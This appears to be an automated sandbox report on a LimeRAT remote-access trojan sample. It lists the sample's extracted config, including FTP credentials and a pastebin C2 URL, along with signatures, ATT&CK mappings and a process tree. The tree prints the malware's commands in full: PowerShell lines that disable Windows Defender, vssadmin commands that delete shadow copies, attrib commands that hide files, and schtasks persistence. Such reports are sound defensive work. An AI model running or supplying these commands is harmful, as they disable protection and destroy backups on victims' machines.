limerat | 4c93b44d1550229fd328c058fbbfe44999ba01e2766b4d3df17c777ce643925e

Analysis

max time kernel
38s
max time network
34s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
19-06-2024 22:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Client.exe
Size

240KB
MD5

16deda7a7a2e8f354fbff30ad723a711
SHA1

8730e18a2fc9722f7700c1192b3cc941169d7701
SHA256

4c93b44d1550229fd328c058fbbfe44999ba01e2766b4d3df17c777ce643925e
SHA512

6a19f30f3eca499e14ab97c5055420cc352852b9e5caeeaf016cd6c707dee6837b92bd7a49e7ca288e391205f3ae0786f43a4fef1ca01e5829594edfe60108cd
SSDEEP

6144:RFCE/UVPy/oCa+LDZWC9z52oMbWknq1dissN:zCzPygCa+DZunq1cd

Score

10^/10

limerat defense_evasion evasion execution impact ransomware rat trojan

Malware Config

Extracted

Credentials

Protocol: ftp
Host:
ftp.encompossoftware.com
Port:
21
Username:
remoteuser
Password:
Encomposx99

Extracted

Family

limerat

Wallets

False

Attributes

aes_key
1
antivm
false
c2_url
https://pastebin.com/raw/GfV4LBjE
download_payload
false
install
true
install_name
svchost.exe
main_folder
False
payload_url
True
pin_spread
true
sub_folder
True
usb_spread
false

Signatures

Contains code to disable Windows Defender 2 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

resource	yara_rule
behavioral1/memory/748-1-0x000002A481F60000-0x000002A481FA2000-memory.dmp	disable_win_def
behavioral1/files/0x001300000001ac47-551.dat	disable_win_def

LimeRAT
Simple yet powerful RAT for Windows machines written in .NET.
rat limerat

Modifies Windows Defender Real-time Protection settings 3 TTPs 3 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	Client.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	Client.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	Client.exe

Modifies security service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4"	Client.exe

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Executes dropped EXE 1 IoCs

pid	Process
876	svchost.exe

Enumerates connected drives 3 TTPs 15 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\g:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\h:	vssadmin.exe
File opened (read-only)	\??\e:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
7	iplogger.org
8	iplogger.org

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
504	cmd.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File created	C:\Windows\rescache\_merged\1601268389\715946058.pri	taskmgr.exe
File created	C:\Windows\rescache\_merged\4183903823\2290032291.pri	taskmgr.exe
File created	C:\Windows\rescache\_merged\1601268389\715946058.pri	taskmgr.exe
File created	C:\Windows\rescache\_merged\4183903823\2290032291.pri	taskmgr.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Disables Windows logging functionality 2 TTPs
Changes registry settings to disable Windows Event logging.

Disable or Modify Tools
T1562.001

Modify Registry
T1112

Interacts with shadow copies 3 TTPs 12 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
920	vssadmin.exe
2780	vssadmin.exe
5124	vssadmin.exe
3636	vssadmin.exe
4484	vssadmin.exe
360	vssadmin.exe
4392	vssadmin.exe
1144	vssadmin.exe
5152	vssadmin.exe
3056	vssadmin.exe
5008	vssadmin.exe
4004	vssadmin.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 6 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
5124	schtasks.exe
6016	schtasks.exe
3996	schtasks.exe
5200	schtasks.exe
3536	schtasks.exe
5468	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
748	Client.exe
748	Client.exe
748	Client.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
2880	powershell.exe
2880	powershell.exe
2880	powershell.exe
4692	taskmgr.exe
4692	taskmgr.exe
1540	powershell.exe
1540	powershell.exe
3332	powershell.exe
3332	powershell.exe
1540	powershell.exe
1540	powershell.exe
1540	powershell.exe
3332	powershell.exe
3332	powershell.exe
3332	powershell.exe
508	powershell.exe
508	powershell.exe
660	powershell.exe
660	powershell.exe
4692	taskmgr.exe
4692	taskmgr.exe
660	powershell.exe
4628	powershell.exe
4628	powershell.exe
508	powershell.exe
660	powershell.exe
3068	powershell.exe
3068	powershell.exe
3068	powershell.exe
508	powershell.exe
4628	powershell.exe
2212	powershell.exe
2212	powershell.exe
5056	powershell.exe
5056	powershell.exe
3068	powershell.exe
4628	powershell.exe
3868	powershell.exe
3868	powershell.exe
1128	powershell.exe
3164	powershell.exe
3164	powershell.exe
1128	powershell.exe
1128	powershell.exe
3164	powershell.exe
5056	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4692	taskmgr.exe
Token: SeSystemProfilePrivilege	4692	taskmgr.exe
Token: SeCreateGlobalPrivilege	4692	taskmgr.exe
Token: SeDebugPrivilege	748	Client.exe
Token: SeDebugPrivilege	2880	powershell.exe
Token: SeIncreaseQuotaPrivilege	2880	powershell.exe
Token: SeSecurityPrivilege	2880	powershell.exe
Token: SeTakeOwnershipPrivilege	2880	powershell.exe
Token: SeLoadDriverPrivilege	2880	powershell.exe
Token: SeSystemProfilePrivilege	2880	powershell.exe
Token: SeSystemtimePrivilege	2880	powershell.exe
Token: SeProfSingleProcessPrivilege	2880	powershell.exe
Token: SeIncBasePriorityPrivilege	2880	powershell.exe
Token: SeCreatePagefilePrivilege	2880	powershell.exe
Token: SeBackupPrivilege	2880	powershell.exe
Token: SeRestorePrivilege	2880	powershell.exe
Token: SeShutdownPrivilege	2880	powershell.exe
Token: SeDebugPrivilege	2880	powershell.exe
Token: SeSystemEnvironmentPrivilege	2880	powershell.exe
Token: SeRemoteShutdownPrivilege	2880	powershell.exe
Token: SeUndockPrivilege	2880	powershell.exe
Token: SeManageVolumePrivilege	2880	powershell.exe
Token: 33	2880	powershell.exe
Token: 34	2880	powershell.exe
Token: 35	2880	powershell.exe
Token: 36	2880	powershell.exe
Token: SeDebugPrivilege	1540	powershell.exe
Token: SeDebugPrivilege	3332	powershell.exe
Token: SeDebugPrivilege	508	powershell.exe
Token: SeIncreaseQuotaPrivilege	1540	powershell.exe
Token: SeSecurityPrivilege	1540	powershell.exe
Token: SeTakeOwnershipPrivilege	1540	powershell.exe
Token: SeLoadDriverPrivilege	1540	powershell.exe
Token: SeSystemProfilePrivilege	1540	powershell.exe
Token: SeSystemtimePrivilege	1540	powershell.exe
Token: SeProfSingleProcessPrivilege	1540	powershell.exe
Token: SeIncBasePriorityPrivilege	1540	powershell.exe
Token: SeCreatePagefilePrivilege	1540	powershell.exe
Token: SeBackupPrivilege	1540	powershell.exe
Token: SeRestorePrivilege	1540	powershell.exe
Token: SeShutdownPrivilege	1540	powershell.exe
Token: SeDebugPrivilege	1540	powershell.exe
Token: SeSystemEnvironmentPrivilege	1540	powershell.exe
Token: SeRemoteShutdownPrivilege	1540	powershell.exe
Token: SeUndockPrivilege	1540	powershell.exe
Token: SeManageVolumePrivilege	1540	powershell.exe
Token: 33	1540	powershell.exe
Token: 34	1540	powershell.exe
Token: 35	1540	powershell.exe
Token: 36	1540	powershell.exe
Token: SeDebugPrivilege	660	powershell.exe
Token: SeDebugPrivilege	4628	powershell.exe
Token: SeIncreaseQuotaPrivilege	3332	powershell.exe
Token: SeSecurityPrivilege	3332	powershell.exe
Token: SeTakeOwnershipPrivilege	3332	powershell.exe
Token: SeLoadDriverPrivilege	3332	powershell.exe
Token: SeSystemProfilePrivilege	3332	powershell.exe
Token: SeSystemtimePrivilege	3332	powershell.exe
Token: SeProfSingleProcessPrivilege	3332	powershell.exe
Token: SeIncBasePriorityPrivilege	3332	powershell.exe
Token: SeCreatePagefilePrivilege	3332	powershell.exe
Token: SeBackupPrivilege	3332	powershell.exe
Token: SeRestorePrivilege	3332	powershell.exe
Token: SeShutdownPrivilege	3332	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4940	taskmgr.exe
4940	taskmgr.exe
4940	taskmgr.exe
4940	taskmgr.exe
4940	taskmgr.exe
4940	taskmgr.exe
4940	taskmgr.exe
4940	taskmgr.exe
4940	taskmgr.exe
4940	taskmgr.exe
4940	taskmgr.exe
4940	taskmgr.exe
4940	taskmgr.exe
4940	taskmgr.exe
4940	taskmgr.exe
4940	taskmgr.exe
4940	taskmgr.exe
4940	taskmgr.exe
4940	taskmgr.exe
4940	taskmgr.exe
4940	taskmgr.exe
4940	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4692	taskmgr.exe
4940	taskmgr.exe
4940	taskmgr.exe
4940	taskmgr.exe
4940	taskmgr.exe
4940	taskmgr.exe
4940	taskmgr.exe
4940	taskmgr.exe
4940	taskmgr.exe
4940	taskmgr.exe
4940	taskmgr.exe
4940	taskmgr.exe
4940	taskmgr.exe
4940	taskmgr.exe
4940	taskmgr.exe
4940	taskmgr.exe
4940	taskmgr.exe
4940	taskmgr.exe
4940	taskmgr.exe
4940	taskmgr.exe
4940	taskmgr.exe
4940	taskmgr.exe
4940	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 748 wrote to memory of 504	748	Client.exe	75
PID 748 wrote to memory of 504	748	Client.exe	75
PID 504 wrote to memory of 2968	504	cmd.exe	77
PID 504 wrote to memory of 2968	504	cmd.exe	77
PID 504 wrote to memory of 1160	504	cmd.exe	78
PID 504 wrote to memory of 1160	504	cmd.exe	78
PID 748 wrote to memory of 2880	748	Client.exe	79
PID 748 wrote to memory of 2880	748	Client.exe	79
PID 748 wrote to memory of 1540	748	Client.exe	82
PID 748 wrote to memory of 1540	748	Client.exe	82
PID 748 wrote to memory of 508	748	Client.exe	84
PID 748 wrote to memory of 508	748	Client.exe	84
PID 748 wrote to memory of 3332	748	Client.exe	85
PID 748 wrote to memory of 3332	748	Client.exe	85
PID 748 wrote to memory of 4628	748	Client.exe	88
PID 748 wrote to memory of 4628	748	Client.exe	88
PID 748 wrote to memory of 660	748	Client.exe	90
PID 748 wrote to memory of 660	748	Client.exe	90
PID 748 wrote to memory of 5056	748	Client.exe	92
PID 748 wrote to memory of 5056	748	Client.exe	92
PID 748 wrote to memory of 3164	748	Client.exe	94
PID 748 wrote to memory of 3164	748	Client.exe	94
PID 748 wrote to memory of 3068	748	Client.exe	95
PID 748 wrote to memory of 3068	748	Client.exe	95
PID 748 wrote to memory of 1128	748	Client.exe	98
PID 748 wrote to memory of 1128	748	Client.exe	98
PID 748 wrote to memory of 2212	748	Client.exe	100
PID 748 wrote to memory of 2212	748	Client.exe	100
PID 748 wrote to memory of 3868	748	Client.exe	102
PID 748 wrote to memory of 3868	748	Client.exe	102
PID 748 wrote to memory of 4236	748	Client.exe	104
PID 748 wrote to memory of 4236	748	Client.exe	104
PID 748 wrote to memory of 5080	748	Client.exe	105
PID 748 wrote to memory of 5080	748	Client.exe	105
PID 748 wrote to memory of 4444	748	Client.exe	106
PID 748 wrote to memory of 4444	748	Client.exe	106
PID 748 wrote to memory of 4800	748	Client.exe	107
PID 748 wrote to memory of 4800	748	Client.exe	107
PID 748 wrote to memory of 1856	748	Client.exe	108
PID 748 wrote to memory of 1856	748	Client.exe	108
PID 748 wrote to memory of 3836	748	Client.exe	109
PID 748 wrote to memory of 3836	748	Client.exe	109
PID 748 wrote to memory of 2584	748	Client.exe	110
PID 748 wrote to memory of 2584	748	Client.exe	110
PID 748 wrote to memory of 2588	748	Client.exe	111
PID 748 wrote to memory of 2588	748	Client.exe	111
PID 748 wrote to memory of 5048	748	Client.exe	112
PID 748 wrote to memory of 5048	748	Client.exe	112
PID 748 wrote to memory of 4172	748	Client.exe	113
PID 748 wrote to memory of 4172	748	Client.exe	113
PID 748 wrote to memory of 4304	748	Client.exe	114
PID 748 wrote to memory of 4304	748	Client.exe	114
PID 748 wrote to memory of 2448	748	Client.exe	115
PID 748 wrote to memory of 2448	748	Client.exe	115
PID 748 wrote to memory of 2232	748	Client.exe	116
PID 748 wrote to memory of 2232	748	Client.exe	116
PID 748 wrote to memory of 4196	748	Client.exe	117
PID 748 wrote to memory of 4196	748	Client.exe	117
PID 1856 wrote to memory of 4392	1856	cmd.exe	132
PID 1856 wrote to memory of 4392	1856	cmd.exe	132
PID 2232 wrote to memory of 1144	2232	cmd.exe	133
PID 2232 wrote to memory of 1144	2232	cmd.exe	133
PID 4444 wrote to memory of 988	4444	cmd.exe	134
PID 4444 wrote to memory of 988	4444	cmd.exe	134

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2968	attrib.exe
1160	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Client.exe
"C:\Users\Admin\AppData\Local\Temp\Client.exe"
1⤵
- Modifies Windows Defender Real-time Protection settings
- Modifies security service
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:748
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding" & attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D
  2⤵
  - Hide Artifacts: Hidden Files and Directories
  - Suspicious use of WriteProcessMemory
  PID:504
- - C:\Windows\system32\attrib.exe
    attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding"
    3⤵
    - Views/modifies file attributes
    PID:2968
- - C:\Windows\system32\attrib.exe
    attrib +H +S "C:\Users\Admin\AppData\Roaming\\Branding\*" /S /D
    3⤵
    - Views/modifies file attributes
    PID:1160
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2880
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1540
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:508
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3332
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4628
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:660
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5056
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3164
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3068
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1128
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2212
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3868
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  PID:4236
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin Delete Shadows /all /quiet
  2⤵
  PID:5080
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:4004
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadow /for=c: /on=c: /maxsize=401MB
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4444
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadow /for=c: /on=c: /maxsize=401MB
    3⤵
    PID:988
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  2⤵
  PID:4800
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
    3⤵
    - Interacts with shadow copies
    PID:920
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1856
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4392
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
  2⤵
  PID:3836
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:3056
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  2⤵
  PID:2584
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:4484
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
  2⤵
  PID:2588
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:3636
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  2⤵
  PID:5048
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:5008
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
  2⤵
  PID:4172
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:360
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  2⤵
  PID:4304
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:5152
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
  2⤵
  PID:2448
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:5124
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2232
- - C:\Windows\system32\vssadmin.exe
    vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
    3⤵
    - Enumerates connected drives
    - Interacts with shadow copies
    PID:1144
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c Vssadmin delete shadowstorage /all /quiet
  2⤵
  PID:4196
- - C:\Windows\system32\vssadmin.exe
    Vssadmin delete shadowstorage /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:2780
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks /create /f /sc ONLOGON /RL HIGHEST /tn MapsToastTask /tr "'C:\Users\Admin\AppData\Roaming\Branding\svchost.exe'"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:3996
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks /create /f /st "09:16" /sc daily /mo "1" /tn "RecommendedTroubleshootingScanner" /tr "'explorer'http://bit.ly/2S82IGk"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:5200
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks /create /f /st "11:06" /sc daily /mo "4" /tn "RecommendedTroubleshootingScanner" /tr "'explorer'http://bit.ly/2S82IGk"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:6016
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks /create /f /st "18:41" /sc daily /mo "1" /tn "RecommendedTroubleshootingScanner" /tr "'explorer'http://bit.ly/2S82IGk"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:5124
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks /create /f /st "22:43" /sc weekly /mo "2" /d "Fri" /tn "RecommendedTroubleshootingScanner" /tr "'explorer'http://bit.ly/2S82IGk"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:5468
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks /create /f /st "12:18" /sc monthly /m "feb" /tn "RecommendedTroubleshootingScanner" /tr "'explorer'http://bit.ly/2S82IGk"
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:3536
- C:\Users\Admin\AppData\Roaming\Branding\svchost.exe
  "C:\Users\Admin\AppData\Roaming\Branding\svchost.exe"
  2⤵
  - Executes dropped EXE
  PID:876

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4692

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:6096

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4940

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Windows Management Instrumentation

T1047

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

